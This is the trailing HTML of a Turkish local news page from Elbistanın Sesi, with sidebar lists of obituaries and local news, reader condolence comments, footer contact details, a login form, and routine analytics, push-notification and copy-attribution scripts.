href="http://www.elbistaninsesi.com/guncel/prof-dr-bingolden-kahramanmaras-icin-korkutan-uyari-h65824.html" title="Prof. Dr. Bingölden Kahramanmaraş..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/prof_dr_bingolden_kahramanmaras_icin_korkutan_uyari_h65824_fd469.jpg" alt="Prof. Dr. Bingölden Kahramanmaraş..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/prof-dr-bingolden-kahramanmaras-icin-korkutan-uyari-h65824.html" title="" ><span class="en-hit">2.</span> <strong>Prof. Dr. Bingöl’den Kahramanmaraş...</strong> <span class="en-spot en-hidden">Elazığ ve Malatya’yı vuran 6,8 büyüklüğündeki depremi 2 ay öncesinden...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/fatih-halitoglu-44-yasinda-h65844.html" title="Fatih Halitoğlu 44 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/fatih_halitoglu_44_yasinda_h65844_1267c.jpg" alt="Fatih Halitoğlu 44 yaşında," ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/fatih-halitoglu-44-yasinda-h65844.html" title="" ><span class="en-hit">3.</span> <strong>Fatih Halitoğlu 44 yaşında,</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/galip-cevik-33-yasinda-h65911.html" title="Galip Çevik 33 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/galip_cevik_33_yasinda_h65911_aaa38.jpg" alt="Galip Çevik 33 yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/galip-cevik-33-yasinda-h65911.html" title="" ><span class="en-hit">4.</span> <strong>Galip Çevik 33 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistan-a-sehit-atesi-dustu-h66085.html" title="Elbistan#039;a şehit ateşi düştü" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/elbistan_a_sehit_atesi_dustu_h66085_82669.jpg" alt="Elbistan#039;a şehit ateşi düştü" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistan-a-sehit-atesi-dustu-h66085.html" title="" ><span class="en-hit">5.</span> <strong>Elbistan&#039;a şehit ateşi düştü</strong> <span class="en-spot en-hidden">Elbistan&#039;a şehit ateşi düştü</span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/fatih-halitoglu-44-yasinda-h65844.html" title="Fatih Halitoğlu 44 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/fatih_halitoglu_44_yasinda_h65844_1267c.jpg" alt="Fatih Halitoğlu 44 yaşında,"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/fatih-halitoglu-44-yasinda-h65844.html" title="" ><span class="en-hit">1.</span> <strong>Fatih Halitoğlu 44 yaşında,</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/galip-cevik-33-yasinda-h65911.html" title="Galip Çevik 33 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/galip_cevik_33_yasinda_h65911_aaa38.jpg" alt="Galip Çevik 33 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/galip-cevik-33-yasinda-h65911.html" title="" ><span class="en-hit">2.</span> <strong>Galip Çevik 33 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistan-a-sehit-atesi-dustu-h66085.html" title="Elbistan#039;a şehit ateşi düştü" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/elbistan_a_sehit_atesi_dustu_h66085_82669.jpg" alt="Elbistan#039;a şehit ateşi düştü"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistan-a-sehit-atesi-dustu-h66085.html" title="" ><span class="en-hit">3.</span> <strong>Elbistan&#039;a şehit ateşi düştü</strong> <span class="en-spot en-hidden">Elbistan&#039;a şehit ateşi düştü</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ali-celenk-90-yasinda-h65810.html" title="Ali Çelenk 90 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/ali_celenk_90_yasinda_h65810_872db.jpg" alt="Ali Çelenk 90 yaşında,"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ali-celenk-90-yasinda-h65810.html" title="" ><span class="en-hit">4.</span> <strong>Ali Çelenk 90 yaşında,</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/nimet-colak-74-yasinda-h65828.html" title="Nimet Çolak 74 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/nimet_colak_74_yasinda_h65828_c3876.jpg" alt="Nimet Çolak 74 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/nimet-colak-74-yasinda-h65828.html" title="" ><span class="en-hit">5.</span> <strong>Nimet Çolak 74 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/sehit-uzman-onbasi-oguzhan-tas-son-yolculuguna-ugurlandi-h66093.html#comment_293713" title="" >Şehidimize Allah&#39;tan rahmet, yakınlarına...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-el-birligi-ve-dogru-tedbirlerle-bu-sureci-atlatacagiz-h66088.html#comment_293712" title="" >Hastalık yayılır sa fırınlar dan yayılır...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/sukriye-yuksel-66-yasinda-h66089.html#comment_293711" title="" >Merhumeye Allah&#39;tan rahmet, yakınlarına...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ibrahim-turk-h66091.html#comment_293710" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-h66101.html#comment_293709" title="" >NUR İÇİNDE YATSIN İNŞALLAH. SEVDİKLERİNE...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ibrahim-turk-h66091.html#comment_293707" title="" >Allah rahmet eyleyesin</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/meliha-taksim-27-yasinda-h25956.html#comment_293705" title="" >Bizlere sensizliği yaşatanların elleri...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-h66101.html#comment_293703" title="" >Allah rahmet eylesin</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/sukriye-yuksel-66-yasinda-h66089.html#comment_293702" title="" >Allah mekanını cennet eylesin.Yakınlarına...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/sukriye-yuksel-66-yasinda-h66089.html#comment_293701" title="" >ÖIüm hayatın başlangıcıdır. Ne ölen...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/himmet-yetisgen-73-yasinda-h66090.html#comment_293700" title="" >ÖIüm hayatın başlangıcıdır. Ne ölen...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/sehit-uzman-onbasi-oguzhan-tas-son-yolculuguna-ugurlandi-h66093.html#comment_293699" title="" >Mekanın cennet olsun yiğidim.Ailenin acısını...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-el-birligi-ve-dogru-tedbirlerle-bu-sureci-atlatacagiz-h66088.html#comment_293698" title="" >sayın başkan ihtiyarlar ulaşım bedava...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/oztunc-nurhak-ikinci-bir-hidroelektrik-santrali-kaldiramaz-h66092.html#comment_293697" title="" >hadi yaaa ciddimi. o aman teekten üretiriz...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ibrahim-turk-h66091.html#comment_293696" title="" >İbrahim abimize Allah rahmet eylesin. Hepinizin...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/sukriye-yuksel-66-yasinda-h66089.html#comment_293695" title="" >Başınız sağ olsun ALLAH rahmet eylesin...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/sukriye-yuksel-66-yasinda-h66089.html#comment_293694" title="" >Allah rahmet etsin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/murat-darendeli-50-yasinda-h66036.html#comment_293693" title="" >Allah rahmet etsin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/sehit-uzman-onbasi-oguzhan-tas-son-yolculuguna-ugurlandi-h66093.html#comment_293692" title="" >Toplu cenaze yemeği vereceğinize elbistandaki...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/kaski-su-zammini-nisan-sonuna-erteledi-h66083.html#comment_293691" title="" >şahsen düşüncem kaski ve ya diğer kurum...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" selected>21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" >Şubat</option> <option value="03" selected>Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2020" selected>2020</option> <option value="2019" >2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> <option value="2016" >2016</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:px;height:px;"> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2020 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="http://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="http://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> gazete@elbistaninsesi.com <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Fkoronavirus-nedeniyle-mangal-ve-piknik-yapmak-da-yasaklandi-h66103.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('66103', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 